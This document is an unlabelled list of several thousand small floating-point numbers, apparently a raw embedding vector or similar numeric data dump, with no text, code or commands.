0.011843198910355568, -0.00836899783462286, 0.0028853537514805794, 0.003923197742551565, -0.016634946689009666, 0.0026700561866164207, 0.0147138312458992, 0.014095541089773178, 0.03338766470551491, 0.014993534423410892, 0.011806395836174488, 0.003923197742551565, 0.011401562951505184, -0.02206706628203392, 0.020064985379576683, 0.019682234153151512, 0.01024594996124506, -0.02386305294930935, 0.02072743885219097, -0.01981472410261631, -0.005163458175957203, -0.004272826015949249, -0.023023944348096848, 0.026395097374916077, -0.006882157176733017, 0.021360449492931366, -0.00927435141056776, 0.022935617715120316, -0.009318514727056026, -0.01650245673954487, -0.0035294059198349714, -0.00510089285671711, 0.0011859760852530599, 0.0002018413506448269, 0.0023701118770986795, 0.008825354278087616, 0.006698142271488905, -0.014949370175600052, -0.015810560435056686, 0.005594052840024233, -0.028927141800522804, 0.004920558538287878, 0.004302268382161856, -0.006212342996150255, -0.013153385370969772, 0.0078095924109220505, 0.027425581589341164, 0.013146024197340012, 0.013234351761639118, 0.01118074543774128, -0.004501004703342915, -0.008795912377536297, -0.011659184470772743, -0.0009642380755394697, 0.0016469333786517382, 0.005928960163146257, 0.008832715451717377, 0.0035754095297306776, 0.009399481117725372, -0.00885479710996151, -0.003568049054592848, -0.0019505579257383943, -0.01054773386567831, -0.02012386918067932, 0.005170818883925676, 0.012189147062599659, 0.013911526650190353, 0.00822178553789854, 0.020506620407104492, 0.011916805058717728, -0.01816595159471035, 0.004673978313803673, -0.0007328393403440714, -0.010474128648638725, 0.001476719626225531, 0.005800149869173765, -0.017886249348521233, 0.016620226204395294, 0.004898476880043745, 0.01478743739426136, 0.007386357989162207, 0.01622275449335575, -0.005796469282358885, -0.008685503154993057, -0.022022902965545654, 0.03135614097118378, -0.016163868829607964, 0.006856395397335291, 0.0007498607155866921, 0.003481562016531825, -0.001425195368938148, -0.02545294165611267, -0.017842084169387817, 0.005203941371291876, 0.007132417522370815, 0.004887435585260391, 0.00025624074623920023, -0.01031955610960722, -0.0010875280713662505, -0.0022376212291419506, -0.005844313185662031, 0.015722233802080154, 0.018048182129859924, 0.01358029991388321, 0.013425727374851704, 0.0005534248193725944, 0.006212342996150255, -0.018813682720065117, 0.014014574699103832, 0.021272122859954834, 0.019844166934490204, -0.002550446428358555, 0.029074354097247124, 0.04272089898586273, 0.0035146845038980246, -0.0011013292241841555, -0.01922587677836418, 0.028102755546569824, -0.014169147238135338, 0.019019780680537224, 0.000253020494710654, -0.023686397820711136, -0.0007461804198101163, 0.006918960250914097, -0.019755840301513672, -0.0005557250115089118, -0.005689740646630526, -0.008162900805473328, 0.018327884376049042, -0.003402435453608632, -0.007728626020252705, 0.004460521042346954, -0.008052492514252663, -0.021949296817183495, 0.015957772731781006, 0.00982639566063881, 0.008729666471481323, 0.0029902420938014984, -0.020962977781891823, 0.0004973002942278981, 0.010775912553071976, -0.003448439296334982, 0.013874723576009274, -0.008302751928567886, -0.0065104472450912, 0.00006607284740312025, 0.007426841650158167, -0.0084794070571661, -0.017385728657245636, -0.008000968024134636, -0.0028246287256479263, 0.020094426348805428, -0.021713757887482643, 0.012903125025331974, -0.014463570900261402, 0.016487734392285347, 0.011673904955387115, 0.006874796934425831, 0.03032565489411354, 0.0007374397246167064, -0.009222826920449734, -0.006249146070331335, -0.032386623322963715, -0.01054773386567831, 0.011983050033450127, -0.00018366987933404744, 0.002331468742340803, 0.005410037934780121, -0.01125435158610344, 0.0003250163281336427, 0.019005058333277702, 0.004037287086248398, -0.0013304277090355754, -0.023244762793183327, 0.024952420964837074, -0.006845354568213224, -0.016473013907670975, 0.013550857082009315, 0.033358220010995865, 0.003783346386626363, 0.011909444816410542, 0.007136098109185696, 0.013705429621040821, 0.0018051861552521586, -0.041837628930807114, 0.0016110504511743784, -0.0011114500230178237, 0.0029221565928310156, 0.02446662075817585, -0.001512602437287569, -0.007099295035004616, -0.010599258355796337, -0.006790149956941605, 0.0033637923188507557, -0.003163216169923544, 0.007264908403158188, 0.008597176522016525, -0.01750349812209606, 0.004350112285465002, -0.013646544888615608, -0.01635524444282055, 0.011725429445505142, -0.03179777413606644, -0.005468922667205334, -0.0011694147251546383, -0.001715018879622221, 0.024496063590049744, -0.01111450046300888, -0.006400038488209248, -0.0023333090357482433, -0.0033509114291518927, -0.033152125775814056, 0.00022576328774448484, 0.002819108311086893, 0.006580372806638479, 0.0003314568311907351, 0.010591898113489151, -0.022111231461167336, -0.003012323984876275, -0.011475169099867344, -0.003963680937886238, 0.019270040094852448, -0.0037759856786578894, -0.008847436867654324, -0.01249829214066267, 0.011151302605867386, -0.008530930615961552, 0.008530930615961552, 0.013050336390733719, -0.008449964225292206, -0.0051781791262328625, 0.0019984019454568624, -0.012822158634662628, -0.016914648935198784, -0.017974575981497765, 0.006035688798874617, 0.019991379231214523, -0.00420290045440197, 0.008832715451717377, 0.002651654649525881, 0.0011620541336014867, 0.0023885134141892195, -0.010820075869560242, 0.0038937553763389587, 0.012137622572481632, 0.03500699624419212, 0.03347599133849144, 0.01710602454841137, 0.02401026524603367, -0.0037115805316716433, 0.016914648935198784, 0.0070772129110991955, -0.007062491960823536, 0.00407408969476819, -0.004048327915370464, -0.0005460642278194427, 0.0005442240508273244, -0.0037723055575042963, 0.021301565691828728, -0.011880001984536648, -0.009244908578693867, 0.01569279097020626, -0.01717963069677353, 0.0038054282777011395, 0.008832715451717377, 0.019270040094852448, 0.021434055641293526, -0.0020204836037009954, -0.00015491755038965493, 0.010643421672284603, -0.0184014905244112, -0.011210187338292599, -0.017002977430820465, -0.02005026303231716, 0.014942009933292866, 0.03001650981605053, 0.002745502395555377, -0.006952083203941584, 0.01628163829445839, -0.002519164001569152, -0.009958886541426182, 0.012108180671930313, 0.010555095039308071, -0.0017536620143800974, 0.025791527703404427, 0.009009369648993015, 0.01531003974378109, -0.008869518525898457, 0.0005589452921412885, -0.016708552837371826, -0.0101723438128829, -0.0070109679363667965, -0.010606618598103523, -0.007529889699071646, 0.005697101354598999, 0.00896520633250475, -0.006679740734398365, 0.0017831043805927038, -0.010164983570575714, -0.008501488715410233, -0.016531899571418762, -0.0062822685576975346, 0.010871600359678268, 0.003269944805651903, -0.012240671552717686, 0.0041734580881893635, -0.006613495759665966, 0.016576062887907028, -0.0033435507211834192, -0.01129115466028452, -0.037627365440130234, -0.01358029991388321, 0.0040336064994335175, -0.00503096729516983, -0.0005824071704410017, -0.020624389871954918, -0.005803829990327358, -0.004482603166252375, 0.00694104190915823, -0.021198516711592674, 0.02063911221921444, -0.009914723224937916, 0.017739037051796913, 0.008023049682378769, -0.010400522500276566, 0.020241638645529747, -0.011342678219079971, -0.002090409165248275, -0.018327884376049042, -0.01823955774307251, 0.01246148906648159, 0.01757710427045822, -0.003956320229917765, 0.026144837960600853, -0.013160745613276958, -0.009892641566693783, 0.01929948292672634, -0.0039489599876105785, -0.017518218606710434, 0.0020812086295336485, -0.007202343083918095, -0.0024952420499175787, -0.009392120875418186, -0.01876951940357685, -0.0016073702136054635, 0.026983944699168205, 0.010304834693670273, 0.02880937233567238, -0.005284907761961222, -0.000024741379093029536, -0.007890558801591396, -0.0015208831755444407, -0.01635524444282055, -0.031562235206365585, 0.004313309211283922, 0.03683242201805115, 0.015707511454820633, -0.0009918402647599578, 0.006216023582965136, 0.009355317801237106, 0.001494201016612351, -0.006385317072272301, 0.008810633793473244, -0.028264688327908516, 0.02040357142686844, -0.010672864504158497, 0.01982944644987583, -0.014912568032741547, 0.016016656532883644, -0.005325391422957182, -0.011585578322410583, -0.004828550852835178, -0.001899033784866333, 0.0028062271885573864, -0.02281784825026989, -0.013160745613276958, 0.003729982068762183, 0.022552866488695145, 0.009995689615607262, 0.016193311661481857, 0.016340523958206177, 0.002202658448368311, -0.020138591527938843, -0.01891673170030117, -0.016708552837371826, 0.003003123216331005, 0.022655915468931198, 0.04077770188450813, -0.01076855231076479, 0.003645335091277957, -0.013896805234253407, 0.013447809033095837, -0.007772789336740971, -0.010466767475008965, -0.0006684341351501644, 0.0032497032079845667, 0.0045856512151658535, -0.0009642380755394697, 0.01313130371272564, 0.0020720078609883785, -0.004328030627220869, 0.004876394756138325, -0.0016791359521448612, 0.010231228545308113, -0.026071231812238693, 0.009598216973245144, 0.016016656532883644, 0.003277305280789733, 0.0025890895631164312, -0.005509406328201294, -0.010672864504158497, 0.006782789248973131, -0.005034647881984711, 0.01944669522345066, -0.006823272444307804, 0.0024860412813723087, -0.0055388486944139, -0.00229834602214396, 0.013013534247875214, 0.02327420562505722, -0.0008593496168032289, -0.004512045532464981, 0.022405654191970825, 0.011997771449387074, 0.015206991694867611, -0.014220671728253365, 0.0067091831006109715, -0.020433014258742332, 0.005594052840024233, 0.013536136597394943, 0.007434201892465353, -0.012270113453269005, 0.00018746517889667302, 0.021640151739120483, -0.004861673805862665, -0.012542455457150936, -0.006701822858303785, 0.011534053832292557, -0.00941420253366232, -0.002274424070492387, -0.009296433068811893, 0.0025725283194333315, -0.007518848869949579, 0.016782158985733986, -0.009561413899064064, -0.010312194935977459, 0.018180672079324722, 0.018666472285985947, -0.006422120146453381, 0.008972566574811935, -0.0012789035681635141, 0.00416609738022089, -0.03056119568645954, -0.003985762596130371, 0.020447736606001854, -0.001057165558449924, 0.009370039217174053, 0.03518364951014519, 0.006201302167028189, 0.0027933462988585234, 0.008207065053284168, 0.009782232344150543, -0.011880001984536648, -0.0021952977403998375, -0.013109221123158932, 0.007677101530134678, 0.0039894431829452515, -0.006974164862185717, 0.013249073177576065, 0.014080820605158806, -0.0015696471091359854, -0.010142900981009007, -0.017959853634238243, 0.005998885724693537, -0.008994648233056068, 0.019549742341041565, 0.013153385370969772, 0.008015689440071583, -0.02454022690653801, 0.003071208717301488, -0.008030409924685955, -0.00794944353401661, -0.004048327915370464, -0.013661266304552555, -0.01965279132127762, -0.009988328441977501, -0.014529816806316376, 0.0044016363099217415, 0.003279145574197173, -0.0049536810256540775, -0.004489963408559561, 0.0016846563667058945, -0.021272122859954834, -0.011408924125134945, 0.02109546773135662, -0.0011473329504951835, 0.016561340540647507, -0.0013690708437934518, -0.007978886365890503, -0.0008308272808790207, -0.018121788278222084, 0.0015659667551517487, 0.02732253260910511, -0.00874438788741827, -0.008545652031898499, -0.020226918160915375, 0.021227959543466568, -0.02005026303231716, 0.019461415708065033, 0.029751529917120934, 0.01523643359541893, -0.011740150861442089, -0.004732863046228886, 0.0035938110668212175, 0.009311153553426266, -0.002460279269143939, -0.02012386918067932, -0.0005000605015084147, 0.033593758940696716, -0.0012798235984519124, 0.010959927923977375, -0.01475063432008028, -0.014632864855229855, -0.005601413547992706, 0.016016656532883644, 0.013756954111158848, -0.001475799479521811, 0.00503096729516983, 0.007493086624890566, 0.019785283133387566, -0.0008331274730153382, -0.021139631047844887, -0.0288240946829319, -0.009119778871536255, 0.0070551312528550625, -0.0011059296084567904, 0.0010654462967067957, 0.015324761159718037, 0.00881799403578043, 0.004018885549157858, -0.017694873735308647, 0.012667586095631123, -0.0023645914625376463, -0.020329967141151428, -0.022994501516222954, -0.008354276418685913, -0.0047255028039216995, -0.00023105370928533375, 0.016679110005497932, -0.03500699624419212, 0.012770634144544601, 0.0020996099337935448, -0.008501488715410233, -0.01666438952088356, -0.006672380492091179, 0.00976015068590641, -0.008656061254441738, -0.007640298921614885, -0.01155613549053669, -0.022847291082143784, -0.01906394399702549, 0.004412677139043808, 0.003752063727006316, 0.012770634144544601, -0.009539332240819931, 0.014345801435410976, -0.015103942714631557, -0.018813682720065117, -0.0070330495946109295, -0.012579258531332016, -0.01430163811892271, -0.022920895367860794, -0.017532939091324806, 0.028779931366443634, -0.015251155011355877, -0.018519259989261627, -0.014132344163954258, 0.002375632291659713, 0.015413087792694569, 0.0009743589325807989, -0.0036085322499275208, -0.02431940846145153, -0.02440773695707321, -0.01340364571660757, -0.004276506137102842, -0.00024496985133737326, -0.013911526650190353, 0.022081788629293442, -0.009590856730937958, -0.012248031795024872, 0.016163868829607964, -0.006381636951118708, -0.022111231461167336, 0.013801117427647114, 0.0023241082672029734, -0.014640226028859615, 0.008862157352268696, -0.025614874437451363, -0.023362532258033752, 0.019078664481639862, -0.010974648408591747, -0.009289071895182133, 0.008111377246677876, 0.011401562951505184, -0.008391079492866993, -0.012328998185694218, -0.006602454464882612, 0.004408997017890215, 0.0034189969301223755, 0.03600803762674332, -0.005468922667205334, -0.0004931599250994623, -0.02214067243039608, 0.01816595159471035, -0.004762305878102779, -0.012792715802788734, -0.006609815172851086, -0.00418449891731143, 0.012682306580245495, -0.00031374540412798524, -0.014640226028859615, -0.011423645541071892, 0.025924019515514374, 0.002861431799829006, -0.0047696661204099655, 0.01062134001404047, 0.006223383825272322, -0.019800003618001938, 0.005899517796933651, 0.022332048043608665, 0.0029074354097247124, -0.009620298631489277, 0.012829518876969814, 0.006311710923910141, 0.011482530273497105, -0.009208105504512787, 0.0007756227860227227, 0.007364276330918074, -0.013911526650190353, -0.018857847899198532, -0.02065383270382881, 0.005262826103717089, -0.005759666208177805, -0.001738020800985396, 0.006175539921969175, 0.01831316389143467, 0.0052996291778981686, 0.0011454927735030651, 0.01726795919239521, 0.014308998361229897, 0.014132344163954258, -0.004607733339071274, 0.02439301460981369, 0.014964091591536999, -0.008641339838504791, -0.009929443709552288, 0.0006978765013627708, -0.016634946689009666, 0.008288031443953514, -0.006606135051697493, -0.006764387711882591, -0.004832231439650059, -0.01757710427045822, -0.006392677780240774, 0.010555095039308071, 0.006602454464882612, 0.015781117603182793, -0.02019747532904148, -0.00603936892002821, 0.004394276067614555, -0.0006031088414601982, 0.01922587677836418, 0.018637029454112053, 0.003306747879832983, 0.017385728657245636, -0.008876878768205643, -0.01148989051580429, -0.0005364034441299736, 0.012064017355442047, 0.030973387882113457, -0.004640855826437473, -0.027955543249845505, 0.02642454020678997, -0.023288926109671593, 0.027720004320144653, 0.004405316896736622, -0.0027197401504963636, -0.00032133603235706687, -0.005078811198472977, -0.012630783021450043, -0.0055241272784769535, 0.001053485320881009, -0.023686397820711136, -0.0004092031449545175, 0.0005129415658302605, -0.008214425295591354, 0.0011473329504951835, 0.005656618159264326, -0.004920558538287878, 0.008310113102197647, -0.003798067569732666, -0.0032846659887582064, 0.011232269927859306, 0.006105614360421896, 0.004835911560803652, -0.012969370000064373, 0.003108011791482568, -0.01426483504474163, -0.008449964225292206, -0.015943050384521484, -0.007452603429555893, 0.0027234205044806004, 0.012034574523568153, 0.012630783021450043, -0.020918814465403557, -0.00647364417091012, 0.0009168542455881834, 0.009105057455599308, 0.004740223754197359, -0.018666472285985947, 0.02342141605913639, -0.00900200940668583, 0.007934722118079662, -0.002208178862929344, -0.00510089285671711, 0.011997771449387074, 0.00875174906104803, -0.001015762216411531, -0.008229146711528301, 0.00748572638258338, -0.006966804154217243, 0.009473087266087532, -0.008987287990748882, 0.006252826191484928, -0.027351975440979004, 0.00023151375353336334, -0.02642454020678997, 0.023730561137199402, -0.011188105680048466, -0.0021529742516577244, -0.005917919334024191, -0.0020204836037009954, 0.006896878592669964, 0.02492297813296318, -0.027234205976128578, 0.018342604860663414, -0.022420374676585197, 0.005042008124291897, 0.034035395830869675, 0.014073459431529045, -0.006771748419851065, -0.00504936883226037, 0.001384712173603475, -0.00964974146336317, -0.007794871460646391, -0.011806395836174488, -0.006561971269547939, -0.01620803214609623, -0.012218589894473553, -0.0043574729934334755, 0.014588701538741589, -0.020830485969781876, -0.02552654780447483, 0.011335317976772785, -0.0002997142728418112, -0.03506587818264961, 0.01051093079149723, 0.012542455457150936, -0.007978886365890503, 0.014927288517355919, 0.00022001282195560634, -0.013933608308434486, 0.020992420613765717, 0.010908403433859348, -0.007655019871890545, 0.00799360778182745, -0.007117696572095156, 0.0028945542871952057, 0.010223868303000927, 0.011394202709197998, -0.018710635602474213, -0.005185539834201336, 0.027190042659640312, -0.000287523289443925, -0.000013844246495864354, -0.005240744445472956, 0.008000968024134636, -0.029854577034711838, 0.02280312590301037, 0.0022725840099155903, 0.023833610117435455, -0.007507808040827513, -0.010636061429977417, -0.026674799621105194, -0.007257547695189714, 0.01013554073870182, -0.00559037271887064, 0.011342678219079971, -0.025997625663876534, 0.006366915535181761, -0.006469964049756527, -0.0026810970157384872, 0.0008883319096639752, 0.023009223863482475, 0.006768068298697472, 0.010974648408591747, -0.01388208381831646, 0.011357399635016918, 0.026453983038663864, 0.017621267586946487, 0.009767510928213596, -0.0184014905244112, 0.020918814465403557, 0.0240985918790102, 0.006609815172851086, 0.0013000653125345707, -0.00007768879004288465, -0.01190208364278078, 0.007544611115008593, -0.0037410228978842497, 0.021787364035844803, -0.008457324467599392, 0.004250744357705116, 0.017621267586946487, -0.0038974357303231955, -0.004512045532464981, -0.004107212647795677, -0.012903125025331974, 0.000388501473935321, -0.009134499356150627, 0.008979926817119122, 0.0021971380338072777, 0.0014601582661271095, 0.0019707996398210526, 0.010444685816764832, -0.005211302079260349, -0.00698152557015419, 0.0018153069540858269, -0.010378440842032433, 0.004854313097894192, -0.014868403784930706, -0.017547661438584328, 0.004442119505256414, -0.003422677284106612, 0.019019780680537224, 0.0005446841241791844, -0.013249073177576065, 0.0013690708437934518, 0.01516282744705677, 0.0021787364967167377, -0.017297400161623955, -0.004320669919252396, 0.00795680470764637, 0.017371006309986115, -0.013226991519331932, 0.002283624839037657, 0.015957772731781006, 0.0003903416218236089, 0.0004945400287397206, 0.0030693686567246914, 0.024437179788947105, 0.007132417522370815, -0.008810633793473244, -0.0013442288618534803, 0.022493980824947357, 0.0014537177048623562, 0.028308851644396782, 0.003665576921775937, -0.004677658900618553, 0.012593979947268963, 0.010525652207434177, 0.007342194672673941, 0.008994648233056068, -0.014257474802434444, 0.0017269798554480076, 0.009988328441977501, 0.01613442599773407, 0.011534053832292557, -0.004515725653618574, 0.0030417663510888815, 0.010643421672284603, -0.018445653840899467, 0.0006578532629646361, 0.002375632291659713, -0.021566545590758324, 0.001701217726804316, 0.003908476326614618, 0.0015135225839912891, -0.0053401123732328415, 0.0038054282777011395, 0.008030409924685955, 0.011835838668048382, 0.005421079229563475, -0.006341153290122747, -0.012542455457150936, -0.0012172586284577847, 0.007220744621008635, 0.007084573619067669, -0.007066172081977129, 0.0020039223600178957, -0.008884239010512829, 0.0021216918248683214, -0.005277547519654036, 0.006749666761606932, 0.015560300089418888, -0.004063048865646124, 0.025099633261561394, 0.007474685087800026, 0.00555725023150444, -0.016031378880143166, 0.01922587677836418, -0.0007613616762682796, -0.039364468306303024, 0.010591898113489151, 0.007677101530134678, 0.016325801610946655, 0.0030399260576814413, -0.009870558977127075, -0.005741265136748552, 0.011651823297142982, -0.009178663603961468, -0.004640855826437473, 0.022346770390868187, 0.0027252607978880405, 0.013734872452914715, 0.0023333090357482433, 0.024216361343860626, 0.024363573640584946, 0.0055719711817801, -0.006885837763547897, -0.00791264045983553, -0.01884312555193901, 0.010194425471127033, 0.016679110005497932, -0.021595988422632217, 0.013065057806670666, -0.01170334778726101, 0.011673904955387115, -0.012181786820292473, 0.0021529742516577244, 0.012829518876969814, -0.021964019164443016, -0.019005058333277702, -0.021669594570994377, 0.0004950001020915806, -0.002092249458655715, -0.0007549211150035262, 0.027234205976128578, 0.005825911648571491, 0.003985762596130371, 0.024231081828475, 0.00043381511932238936, 0.013307957910001278, -0.003361952258273959, -0.014728552661836147, 0.0018051861552521586, -0.0037134208250790834, -0.0068527148105204105, -0.0068490346893668175, -0.014080820605158806, -0.011188105680048466, -0.008067212998867035, 0.01868119277060032, 0.03226885199546814, 0.02415747568011284, -0.010606618598103523, -0.01246148906648159, -0.0011197306448593736, 0.0039894431829452515, -0.003194498596712947, -0.004081450402736664, 0.0006578532629646361, 0.010106098838150501, 0.011541415005922318, 0.00043703539995476604, 0.01584000326693058, 0.0351247638463974, 0.005984164774417877, -0.008067212998867035, 0.010945206508040428, 0.005597733426839113, 0.017164910212159157, 0.011865280568599701, 0.0016266917809844017, 0.03232773765921593, 0.010304834693670273, -0.015589742921292782, 0.006613495759665966, -0.007971525192260742, -0.004530447069555521, 0.018430933356285095, -0.020079705864191055, -0.011011451482772827, 0.021713757887482643, -0.03912892937660217, 0.013256433419883251, -0.002283624839037657, -0.005373235326260328, 0.0036858185194432735, 0.007868477143347263, 0.0010930484859272838, -0.011158663779497147, -0.006245465949177742, -0.009473087266087532, 0.00840580090880394, -0.011865280568599701, -0.026439260691404343, -0.004169777501374483, 0.02003554254770279, 0.014316359534859657, 0.023921936750411987, -0.009546693414449692, 0.005259145982563496, 0.005505725741386414, -0.005207621492445469, 0.004501004703342915, -0.00092881522141397, -0.02108074724674225, 0.013705429621040821, -0.015221713110804558, 0.0021897773258388042, 0.005774387624114752, -0.009053532965481281, 0.01815122924745083, 0.011239630170166492, -0.001343308831565082, 0.0019560784567147493, -0.006653978955000639, -0.0213162861764431, -0.0026038107462227345, 0.01235107984393835, -0.016870485618710518, -0.006801190786063671, -0.012630783021450043, -0.011504611931741238, 0.014772715978324413, -0.010407882742583752, 0.005866394843906164, 0.006164499092847109, -0.00867078173905611, -0.016237474977970123, -0.023068107664585114, 0.019991379231214523, -0.012255392037332058, -0.013536136597394943, -0.0035257255658507347, -0.008236506953835487, 0.017827363684773445, -0.01884312555193901, -0.00562717579305172, 0.005064090248197317, 0.004515725653618574, -0.0018033459782600403, 0.0025044428184628487, 0.0016395727870985866, 0.005630855914205313, -0.0270133875310421, 0.01717963069677353, 0.020742159336805344, -0.012719109654426575, -0.006948402617126703, 0.0018797122174873948, -0.006860075518488884, -0.0184014905244112, -0.0049720825627446175, 0.011453087441623211, -0.0024124353658407927, -0.01058453693985939, 0.006388997193425894, -0.006466283462941647, -0.005391636397689581, 0.0021897773258388042, 0.01377903576940298, 0.021213237196207047, 0.02545294165611267, -0.015854723751544952, -0.0059326402842998505, -0.007489406503736973, 0.02957487478852272, -0.004029926378279924, 0.01152669358998537, -0.0035073240287601948, -0.0030564875341951847, 0.01440468616783619, 0.00512297498062253, 0.00407408969476819, 0.021581267938017845, -0.02387777343392372, -0.00022553326562047005, 0.01725323684513569, -0.002119851764291525, 0.002901914995163679, 0.014772715978324413, 0.013219630345702171, 0.006175539921969175, 0.023598071187734604, 0.01884312555193901, -0.005262826103717089, 0.0032938667573034763, 0.01607554219663143, 0.007095614448189735, 0.002119851764291525, -0.009392120875418186, 0.005991525016725063, -0.00012317497748881578, 0.01635524444282055, -0.006377956364303827, 0.011467808857560158, 0.014250113628804684, -0.013278515078127384, -0.020609669387340546, -0.013182827271521091, 0.007897919975221157, -0.008832715451717377, -0.0011740151094272733, -0.018489817157387733, 0.037862904369831085, 0.014654946513473988, 0.013013534247875214, -0.009657101705670357, -0.006315391510725021, -0.004099851939827204, 0.009451005607843399, 0.007084573619067669, -0.019005058333277702, -0.02230260521173477, -0.03483033925294876, -0.018327884376049042, -0.002233940875157714, 0.003919517621397972, -0.0007604415877722204, 0.0009347957093268633, -0.017768478021025658, 0.0018447494367137551, -0.01419122889637947, -0.0032589039765298367, 0.03656744211912155, 0.010407882742583752, 0.00027533230604603887, 0.01717963069677353, -0.006120335776358843, -0.04466409608721733, 0.0008248467929661274, -0.004629814997315407, 0.022493980824947357, 0.005873755551874638, -0.008251228369772434, 0.004125614184886217, 0.01523643359541893, -0.008987287990748882, -0.007191302254796028, 0.00007803381595294923, -0.006896878592669964, 0.013514054007828236, 0.00602096738293767, 0.00976015068590641, -0.013109221123158932, 0.015471972525119781, 0.007275949232280254, 0.008906321600079536, 0.018857847899198532, -0.011129220947623253, 0.019343646243214607, 0.000059344805777072906, 0.009171302430331707, -0.017694873735308647, -0.0018217475153505802, 0.020315244793891907, -0.005457881838083267, 0.004714461974799633, -0.01231427676975727, -0.0008036851068027318, -0.004519405774772167, -0.004471562337130308, 0.005413718521595001, 0.01613442599773407, 0.023362532258033752, 0.003553327638655901, -0.01569279097020626, -0.00024865014711394906, 0.0024381973780691624, 0.0072391461580991745, -0.01516282744705677, -0.013572938740253448, 0.0011611339868977666, -0.01388944499194622, -0.004224982112646103, -0.015869444236159325, -0.010974648408591747, -0.027528628706932068, -0.0029663201421499252, -0.012881043367087841, 0.0012743031838908792, 0.01107033621519804, 0.0013175467029213905, 0.01847509667277336, 0.03235717862844467, 0.027366695925593376, -0.004081450402736664, 0.0003473281394690275, 0.015957772731781006, 0.024142755195498466, -0.007942083291709423, -0.0036931789945811033, -0.025541268289089203, -0.006138737313449383, 0.009443644434213638, 0.01444885041564703, 0.007331153843551874, 0.0015061619924381375, 0.003623253433033824, 0.01444885041564703, -0.01160029973834753, 0.01170334778726101, 0.002644294174388051, 0.010878960601985455, -0.00012202488142065704, 0.0033233091235160828, 0.0032313016708940268, -0.0062565067782998085, -0.006388997193425894, -0.008170261979103088, 0.0074452427215874195, 0.019387809559702873, -0.008494127541780472, 0.025467662140727043, 0.01163710281252861, -0.006782789248973131, 0.01628163829445839, 0.011151302605867386, -0.004718142095953226, -0.005962082650512457, 0.005421079229563475, 0.006319071631878614, 0.004224982112646103, 0.007051451131701469, -0.005818551406264305, -0.010989369824528694, 0.020697996020317078, 0.00885479710996151, 0.008950484916567802, 0.00022737341350875795, 0.008722306229174137, -0.022096509113907814, 0.008162900805473328, -0.011578217148780823, 0.023745283484458923, -0.002221059752628207, -0.000978959258645773, -0.0066466182470321655, -0.01475063432008028, 0.026969224214553833, 0.05794261395931244, -0.009311153553426266, -0.003512844443321228, 0.0021695357281714678, 0.011673904955387115, 0.0015751675236970186, -0.023966100066900253, 0.02183152735233307, 0.01009873766452074, 0.021492941305041313, 0.0004036827012896538, -0.006296989973634481, -0.007349555380642414, 0.0029718405567109585, 0.002208178862929344, 0.0005258225719444454, 0.0102385887876153, -0.002202658448368311, -0.012991451658308506, -0.005634536501020193, 0.011872641742229462, -0.003752063727006316, 0.0102385887876153, 0.008214425295591354, -0.00021541243768297136, -0.015530857257544994, -0.014419407583773136, -0.003043606411665678, -0.0051119341515004635, 0.011916805058717728, -0.01396305114030838, -0.004144015721976757, -0.006009926553815603, 0.004213941283524036, -0.004162417259067297, -0.00115929392632097, -0.01433844119310379, 0.007890558801591396, -0.01704714074730873, -0.0050935326144099236, -0.02080104500055313, 0.00791264045983553, -0.019270040094852448, -0.0018539500888437033, 0.01253509521484375, -0.010452046059072018, -0.0068711163476109505, -0.007507808040827513, -0.022479260340332985, -0.002478680806234479, -0.011401562951505184, 0.005693421233445406, -0.016855765134096146, 0.008729666471481323, 0.006087212823331356, 0.003853271948173642, -0.005973123479634523, -0.0010516451438888907, 0.030296213924884796, 0.004254424478858709, 0.010128180496394634, 0.02777888998389244, -0.01103353314101696, 0.011055615730583668, 0.005358513910323381, -0.013300596736371517, -0.018372047692537308, -0.001259582000784576, -0.002638773759827018, -0.010113459080457687, 0.0009605577797628939, -0.022920895367860794, -0.007426841650158167, -0.00697784498333931, -0.006429480854421854, -0.011298514902591705, 0.0000767687160987407, -0.008862157352268696, 0.004751264583319426, 0.012152343988418579, -0.005259145982563496, -0.006028328090906143, -0.0005819470970891416, 0.011622381396591663, 0.007780150044709444, -0.006635577417910099, -0.02236149087548256, 0.020668553188443184, -0.0004699280543718487, 0.014360522851347923, -0.025187959894537926, -0.01252773404121399, -0.028956584632396698, -0.00008010398596525192, 0.020521340891718864, 0.024378294125199318, -0.018048182129859924, 0.009318514727056026, 0.0027933462988585234, -0.024584390223026276, 0.02823524735867977, 0.008052492514252663, 0.012564537115395069, 0.0028430302627384663, -0.014735912904143333, 0.01576639711856842, -0.0038606326561421156, -0.00030224447255022824, 0.02056550607085228, -0.025614874437451363, -0.0008671702235005796, -0.019726397469639778, 0.0017232995014637709, -0.0033913946244865656, -0.003978402353823185, -0.0036269337870180607, 0.003945279400795698, -0.04669561982154846, -0.005325391422957182, 0.004000484012067318, 0.011121860705316067, 0.008140819147229195, 0.014596061781048775, -0.009186023846268654, -0.012630783021450043, -0.029324615374207497, 0.01567807048559189, 0.004523086361587048, 0.00885479710996151, -0.0193730890750885, 0.003536766394972801, 0.016988255083560944, -0.0020168032497167587, -0.015589742921292782, 0.05105309560894966, 0.018107065930962563, -0.00010500350617803633, 0.013462530449032784, 0.0007006367086432874, 0.006234424654394388, 0.006812231615185738, -0.01838676817715168, -0.01009873766452074, 0.015368924476206303, 0.00006498026050394401, -0.005472603254020214, 0.028058592230081558, -0.026925060898065567, -0.0033858742099255323, 1.8689013359107776e-7, 0.00027694241725839674, 0.0006238105124793947, -0.0010148421861231327, -0.02454022690653801, -0.027307812124490738, -0.012630783021450043, 0.03017844446003437, -0.020771602168679237, 0.0026369334664195776, 0.0023977141827344894, 0.004924238659441471, -0.01642885059118271, 0.015560300089418888, -0.003384034149348736, 0.022170115262269974, -0.00784639548510313, -0.006878477055579424, 0.01287368219345808, -0.002791506005451083, 0.004570930264890194, 0.003985762596130371, 0.009620298631489277, 0.0004570470191538334, -0.004052008036524057, -0.0026277326978743076, 0.033888183534145355, -0.01162974163889885, 0.006683421321213245, 0.001103169284760952, -0.0005414638435468078, -0.004791748244315386, -0.007209703791886568, 0.021183796226978302, -0.0016073702136054635, 0.001957918517291546, 0.017650708556175232, -0.005034647881984711, 0.010429964400827885, 0.0021088107023388147, -0.0029000749345868826, 0.009082975797355175, -0.011725429445505142, -0.0011408923892304301, -0.019343646243214607, 0.00022472819546237588, -0.010923124849796295, -0.0037005397025495768, 0.014242753386497498, -0.00927435141056776, -0.012917846441268921, 0.007750707678496838, 0.027366695925593376, -0.020624389871954918, 0.004537807311862707, 0.006403718609362841, -0.005380595568567514, 0.0010820076568052173, 0.007334833964705467, -0.01801873929798603, -0.026071231812238693, 0.020609669387340546, -0.012380522675812244, 0.0034999633207917213, -0.00698152557015419, -0.020889371633529663, -0.006609815172851086, 0.014794797636568546, 0.001254981616511941, 0.012593979947268963, -0.004423718433827162, 